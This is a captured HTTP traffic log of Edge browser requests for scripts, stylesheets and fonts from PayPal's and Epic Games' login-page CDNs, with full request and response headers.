accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: max-age=31536000, s-maxage=31536000
content-type: application/javascript
date: Mon, 30 Oct 2023 06:49:08 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"651d83fd-c3d"
expires: Tue, 29 Oct 2024 06:49:08 GMT
last-modified: Wed, 04 Oct 2023 15:25:49 GMT
paypal-debug-id: 273e9732742ef
server: ECAcc (ama/4903)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-0000000000000000000273e9732742ef-4d1359b7e65d2036-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 966
GET

https://www.paypalobjects.com/pa/3pjs/qualtrics/1.64.1/CoreModule.js?Q_CLIENTVERSION=1.64.1&Q_CLIENTTYPE=hostedjs&Q_BRANDID=paypalxm

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /pa/3pjs/qualtrics/1.64.1/CoreModule.js?Q_CLIENTVERSION=1.64.1&Q_CLIENTTYPE=hostedjs&Q_BRANDID=paypalxm HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: s-maxage=31536000, public,max-age=3600
content-type: application/javascript
date: Mon, 30 Oct 2023 06:49:08 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"653774cb-190b6"
expires: Mon, 30 Oct 2023 07:49:08 GMT
last-modified: Tue, 24 Oct 2023 07:39:55 GMT
paypal-debug-id: 9f14bf82fbc57
server: ECAcc (ama/489D)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-00000000000000000009f14bf82fbc57-38c353f718ef10a3-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 29913
GET

https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/lib/jquery-1.12.4.js

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/lib/jquery-1.12.4.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: max-age=31536000, s-maxage=31536000
content-type: application/javascript
date: Mon, 30 Oct 2023 06:49:08 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"651d83fd-47a35"
expires: Tue, 29 Oct 2024 06:49:08 GMT
last-modified: Wed, 04 Oct 2023 15:25:49 GMT
paypal-debug-id: 073a9335892ae
server: ECAcc (ama/4888)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-0000000000000000000073a9335892ae-233ddada129d93ae-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 87654
GET

https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/core/baseView.js

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/core/baseView.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: max-age=31536000, s-maxage=31536000
content-type: application/javascript
date: Mon, 30 Oct 2023 06:49:08 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"651d83fd-802"
expires: Tue, 29 Oct 2024 06:49:08 GMT
last-modified: Wed, 04 Oct 2023 15:25:49 GMT
paypal-debug-id: 1c35a219163fe
server: ECAcc (ama/48CE)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-00000000000000000001c35a219163fe-8337f5b4e89ae4cd-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 804
GET

https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/opinionLab/opinionLab.js

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/opinionLab/opinionLab.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: max-age=31536000, s-maxage=31536000
content-type: application/javascript
date: Mon, 30 Oct 2023 06:49:08 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"651d83fd-10db"
expires: Tue, 29 Oct 2024 06:49:08 GMT
last-modified: Wed, 04 Oct 2023 15:25:49 GMT
paypal-debug-id: c7c51da4348cb
server: ECAcc (ama/48F3)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-0000000000000000000c7c51da4348cb-f920ec2669c64d8b-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 1522
GET

https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/opinionLab/onlineOpinionPopup.js

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/opinionLab/onlineOpinionPopup.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: max-age=31536000, s-maxage=31536000
content-type: application/javascript
date: Mon, 30 Oct 2023 06:49:08 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"651d83fd-ef0"
expires: Tue, 29 Oct 2024 06:49:08 GMT
last-modified: Wed, 04 Oct 2023 15:25:49 GMT
paypal-debug-id: e7fe3ce213f8e
server: ECAcc (ama/48E4)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-0000000000000000000e7fe3ce213f8e-eb190742ec99a922-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 1393
GET

https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/lib/dust-core.js

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/lib/dust-core.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: max-age=31536000, s-maxage=31536000
content-type: application/javascript
date: Mon, 30 Oct 2023 06:49:12 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"651d83fd-6349"
expires: Tue, 29 Oct 2024 06:49:12 GMT
last-modified: Wed, 04 Oct 2023 15:25:49 GMT
paypal-debug-id: 8d7d2f38332d2
server: ECAcc (ama/48AD)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-00000000000000000008d7d2f38332d2-04d4c5ef92b7dd1b-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 6817
GET

https://www.paypalobjects.com/pa/3pjs/qualtrics/1.64.1/4.bee7caf079144a7b9980.chunk.js?Q_CLIENTVERSION=1.64.1&Q_CLIENTTYPE=hostedjs&Q_BRANDID=paypalxm

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /pa/3pjs/qualtrics/1.64.1/4.bee7caf079144a7b9980.chunk.js?Q_CLIENTVERSION=1.64.1&Q_CLIENTTYPE=hostedjs&Q_BRANDID=paypalxm HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: s-maxage=31536000, public,max-age=3600
content-type: application/javascript
date: Mon, 30 Oct 2023 06:49:18 GMT
dc: ccg11-origin-www-1.paypal.com
etag: "653774cb-9ed+gzip"
expires: Mon, 30 Oct 2023 07:49:18 GMT
last-modified: Tue, 24 Oct 2023 07:39:55 GMT
paypal-debug-id: d6fbf9ec9e06f
server: ECAcc (ama/488A)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-0000000000000000000d6fbf9ec9e06f-cc0e61618bf2d25b-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 1231
GET

https://www.paypalobjects.com/pa/3pjs/qualtrics/1.64.1/1.1303dc17a61da0f506d3.chunk.js?Q_CLIENTVERSION=1.64.1&Q_CLIENTTYPE=hostedjs&Q_BRANDID=paypalxm

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /pa/3pjs/qualtrics/1.64.1/1.1303dc17a61da0f506d3.chunk.js?Q_CLIENTVERSION=1.64.1&Q_CLIENTTYPE=hostedjs&Q_BRANDID=paypalxm HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: s-maxage=31536000, public,max-age=3600
content-type: application/javascript
date: Mon, 30 Oct 2023 06:49:19 GMT
dc: ccg11-origin-www-1.paypal.com
etag: "653774cb-7257+gzip"
expires: Mon, 30 Oct 2023 07:49:19 GMT
last-modified: Tue, 24 Oct 2023 07:39:55 GMT
paypal-debug-id: fde9f2a54ca8d
server: ECAcc (ama/48DD)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-0000000000000000000fde9f2a54ca8d-11739bc8d9771b69-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 6548
GET

https://www.paypalobjects.com/pa/3pjs/qualtrics/1.64.1/17.0e47ac923c1fa85e46cf.chunk.js?Q_CLIENTVERSION=1.64.1&Q_CLIENTTYPE=hostedjs&Q_BRANDID=paypalxm

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /pa/3pjs/qualtrics/1.64.1/17.0e47ac923c1fa85e46cf.chunk.js?Q_CLIENTVERSION=1.64.1&Q_CLIENTTYPE=hostedjs&Q_BRANDID=paypalxm HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: s-maxage=31536000, public,max-age=3600
content-type: application/javascript
date: Mon, 30 Oct 2023 06:49:20 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"653774cb-4a99"
expires: Mon, 30 Oct 2023 07:49:20 GMT
last-modified: Tue, 24 Oct 2023 07:39:55 GMT
paypal-debug-id: a52b6f8d7303d
server: ECAcc (ama/48BD)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-0000000000000000000a52b6f8d7303d-9eab9adbd663ff63-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 7754
GET

https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/lib/underscore-1.13.4.js

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/lib/underscore-1.13.4.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: max-age=31536000, s-maxage=31536000
content-type: application/javascript
date: Mon, 30 Oct 2023 06:49:22 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"651d83fd-ffa1"
expires: Tue, 29 Oct 2024 06:49:22 GMT
last-modified: Wed, 04 Oct 2023 15:25:49 GMT
paypal-debug-id: a72cdd8bf6851
server: ECAcc (ama/48A7)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-0000000000000000000a72cdd8bf6851-6e5634fa22e7b7ba-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 19241
GET

https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/lib/dust-helpers.js

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/lib/dust-helpers.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: max-age=31536000, s-maxage=31536000
content-type: application/javascript
date: Mon, 30 Oct 2023 06:49:24 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"651d83fd-59d0"
expires: Tue, 29 Oct 2024 06:49:24 GMT
last-modified: Wed, 04 Oct 2023 15:25:49 GMT
paypal-debug-id: b422404f011a4
server: ECAcc (ama/48F9)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-0000000000000000000b422404f011a4-c4c14e9425fdbf63-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 5009
GET

https://static-assets-prod.unrealengine.com/account-portal/static/static/js/3.5de44e1c.chunk.js

MicrosoftEdgeCP.exe

Remote address:

18.239.36.22:443

Request

GET /account-portal/static/static/js/3.5de44e1c.chunk.js HTTP/2.0
host: static-assets-prod.unrealengine.com
accept: application/javascript, */*;q=0.8
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: application/javascript
date: Fri, 20 Oct 2023 18:55:53 GMT
last-modified: Fri, 20 Oct 2023 18:50:18 GMT
etag: W/"a5e6aab6716c77c173e3aca56796d4ea"
x-amz-server-side-encryption: AES256
server: AmazonS3
content-encoding: gzip
vary: Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method,Origin
x-cache: Hit from cloudfront
via: 1.1 bec13cdbd4d650c71ed35e5a7991d3ca.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS58-P2
x-amz-cf-id: u6tkcEUOKTL0UNmOS7tW2zoTNbmoVS19q1j5vwNWTvkkOuwfCMQ8hg==
age: 820358
GET

https://static-assets-prod.unrealengine.com/account-portal/static/static/js/main.dc2d21f8.chunk.js

MicrosoftEdgeCP.exe

Remote address:

18.239.36.22:443

Request

GET /account-portal/static/static/js/main.dc2d21f8.chunk.js HTTP/2.0
host: static-assets-prod.unrealengine.com
accept: application/javascript, */*;q=0.8
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: application/javascript
date: Fri, 20 Oct 2023 18:55:53 GMT
last-modified: Fri, 20 Oct 2023 18:50:19 GMT
etag: W/"253e21cbfe6159ec3db01178be49c50f"
x-amz-server-side-encryption: AES256
server: AmazonS3
content-encoding: gzip
vary: Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method,Origin
x-cache: Hit from cloudfront
via: 1.1 bec13cdbd4d650c71ed35e5a7991d3ca.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS58-P2
x-amz-cf-id: YpCTEixv2-xvF6CmvVGgXTEbFxH-KgB0_Pb6Ak0IWTPDINbieVbRpQ==
age: 820359
GET

https://static-assets-prod.unrealengine.com/account-portal/static/static/css/4.2a621477.chunk.css

MicrosoftEdgeCP.exe

Remote address:

18.239.36.22:443

Request

GET /account-portal/static/static/css/4.2a621477.chunk.css HTTP/2.0
host: static-assets-prod.unrealengine.com
accept: text/css, */*
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: text/css
date: Tue, 03 Oct 2023 13:01:25 GMT
last-modified: Mon, 02 Oct 2023 22:51:39 GMT
etag: W/"152f94ae12e71962b5325dfc3d261a29"
x-amz-server-side-encryption: AES256
server: AmazonS3
content-encoding: gzip
vary: Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method,Origin
x-cache: Hit from cloudfront
via: 1.1 bec13cdbd4d650c71ed35e5a7991d3ca.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS58-P2
x-amz-cf-id: CPh9AWvwyRjR5TbN5F-EujNVD_4vR8iIIp399WRX8fJHS0djdshsWQ==
age: 2310427
GET

https://static-assets-prod.unrealengine.com/account-portal/static/static/js/4.43f67ce5.chunk.js

MicrosoftEdgeCP.exe

Remote address:

18.239.36.22:443

Request

GET /account-portal/static/static/js/4.43f67ce5.chunk.js HTTP/2.0
host: static-assets-prod.unrealengine.com
accept: application/javascript, */*;q=0.8
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: application/javascript
date: Mon, 16 Oct 2023 11:37:32 GMT
last-modified: Mon, 16 Oct 2023 11:32:09 GMT
etag: W/"a3c9bd016fcbd5043d50b5a480063133"
x-amz-server-side-encryption: AES256
server: AmazonS3
content-encoding: gzip
vary: Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method,Origin
x-cache: Hit from cloudfront
via: 1.1 bec13cdbd4d650c71ed35e5a7991d3ca.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS58-P2
x-amz-cf-id: NpWuWmQLP4nrw3p_RhkIh0QWL9g9nGRpudqhWvG6sd_jZpY7QyJQkQ==
age: 1192261
GET

https://static-assets-prod.unrealengine.com/account-portal/static/static/js/polyfills.673adada.chunk.js

MicrosoftEdgeCP.exe

Remote address:

18.239.36.22:443

Request

GET /account-portal/static/static/js/polyfills.673adada.chunk.js HTTP/2.0
host: static-assets-prod.unrealengine.com
accept: application/javascript, */*;q=0.8
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: application/javascript
date: Mon, 16 Oct 2023 11:37:32 GMT
last-modified: Mon, 16 Oct 2023 11:32:10 GMT
etag: W/"0af2dea335748e22b2b0f4c36f65c95d"
x-amz-server-side-encryption: AES256
server: AmazonS3
content-encoding: gzip
vary: Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method,Origin
x-cache: Hit from cloudfront
via: 1.1 bec13cdbd4d650c71ed35e5a7991d3ca.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS58-P2
x-amz-cf-id: LrX3MitHVMdpSb4CThj9IcS5RE8DU1yTC49iAuvxl1WpfBB1dD0mvg==
age: 1192262
GET

https://static-assets-prod.unrealengine.com/account-portal/static/static/media/Brutal-Light.cc0166f5.woff2

MicrosoftEdgeCP.exe

Remote address:

18.239.36.22:443

Request

GET /account-portal/static/static/media/Brutal-Light.cc0166f5.woff2 HTTP/2.0
host: static-assets-prod.unrealengine.com
accept: */*
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://www.epicgames.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: binary/octet-stream
content-length: 20248
access-control-allow-origin: https://www.epicgames.com
access-control-allow-methods: GET, HEAD
access-control-max-age: 3000
access-control-allow-credentials: true
last-modified: Wed, 23 Aug 2023 15:54:03 GMT
x-amz-server-side-encryption: AES256
accept-ranges: bytes
server: AmazonS3
date: Sun, 08 Oct 2023 06:09:51 GMT
etag: "a724d1efe0d15b8e9f08ad0288e177fd"
vary: Origin,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Hit from cloudfront
via: 1.1 bec13cdbd4d650c71ed35e5a7991d3ca.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS58-P2
x-amz-cf-id: kqe0oVmQAXV_VOapsQeua7jtYoL7RHA_kxVm2WIR5QKXlybRV-qIiA==
age: 2464608
GET

https://static-assets-prod.unrealengine.com/account-portal/static/static/media/Brutal-Regular.85a5d915.woff2

MicrosoftEdgeCP.exe

Remote address:

18.239.36.22:443

Request

GET /account-portal/static/static/media/Brutal-Regular.85a5d915.woff2 HTTP/2.0
host: static-assets-prod.unrealengine.com
accept: */*
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://www.epicgames.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: binary/octet-stream
content-length: 27668
access-control-allow-origin: https://www.epicgames.com
access-control-allow-methods: GET, HEAD
access-control-max-age: 3000
access-control-allow-credentials: true
last-modified: Mon, 11 Sep 2023 16:46:04 GMT
x-amz-server-side-encryption: AES256
accept-ranges: bytes
server: AmazonS3
date: Thu, 12 Oct 2023 11:40:45 GMT
etag: "4555758a9a1a19e87a66eceaf00b1b23"
vary: Accept-Encoding,Origin,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Hit from cloudfront
via: 1.1 bec13cdbd4d650c71ed35e5a7991d3ca.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS58-P2
x-amz-cf-id: QDYJik_ngIoPhydqhQPt_a5teDk4im9qZIa2s0sc770p0ogicLoBNQ==
age: 1537679
GET

https://static-assets-prod.unrealengine.com/account-portal/static/static/media/Brutal-Medium.df2da420.woff2

MicrosoftEdgeCP.exe

Remote address:

18.239.36.22:443

Request

GET /account-portal/static/static/media/Brutal-Medium.df2da420.woff2 HTTP/2.0
host: static-assets-prod.unrealengine.com
accept: */*
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://www.epicgames.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: binary/octet-stream
content-length: 26940
date: Tue, 03 Oct 2023 13:02:08 GMT
access-control-allow-origin: https://www.epicgames.com
access-control-allow-methods: GET, HEAD
access-control-max-age: 3000
access-control-allow-credentials: true
last-modified: Mon, 02 Oct 2023 22:51:41 GMT
etag: "5f601a4caa6f187bd35621b49fc8e2bc"
x-amz-server-side-encryption: AES256
accept-ranges: bytes
server: AmazonS3
vary: Origin,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Hit from cloudfront
via: 1.1 bec13cdbd4d650c71ed35e5a7991d3ca.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS58-P2
x-amz-cf-id: es4r7d5pNxj2upcFVpAFwxxhiQ9pbdj9iemB8q91xSkyFSpklLAYTw==
age: 2310396
GET

https://static-assets-prod.unrealengine.com/account-portal/static/static/media/Brutal-Bold.402a3847.woff2

MicrosoftEdgeCP.exe

Remote address:

18.239.36.22:443

Request

GET /account-portal/static/static/media/Brutal-Bold.402a3847.woff2 HTTP/2.0
host: static-assets-prod.unrealengine.com
accept: */*
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://www.epicgames.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: binary/octet-stream
content-length: 27176
date: Tue, 03 Oct 2023 13:02:30 GMT
access-control-allow-origin: https://www.epicgames.com
access-control-allow-methods: GET, HEAD
access-control-max-age: 3000
access-control-allow-credentials: true
last-modified: Mon, 02 Oct 2023 22:51:41 GMT
etag: "0dfc6422538b3d86ce582109b873e084"
x-amz-server-side-encryption: AES256
accept-ranges: bytes
server: AmazonS3
vary: Origin,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Hit from cloudfront
via: 1.1 bec13cdbd4d650c71ed35e5a7991d3ca.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS58-P2
x-amz-cf-id: -i_gFNihAvL3Hg8LY777sUaU3AmlNClAOCcy_HssATm6rB96KZsy8g==
age: 2310374
GET

https://static-assets-prod.unrealengine.com/account-portal/static/static/js/46.7a1489f3.chunk.js

MicrosoftEdgeCP.exe

Remote address:

18.239.36.22:443

Request

GET /account-portal/static/static/js/46.7a1489f3.chunk.js HTTP/2.0
host: static-assets-prod.unrealengine.com
accept: application/javascript, */*;q=0.8
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: application/javascript
date: Mon, 16 Oct 2023 11:37:33 GMT
last-modified: Mon, 16 Oct 2023 11:32:09 GMT
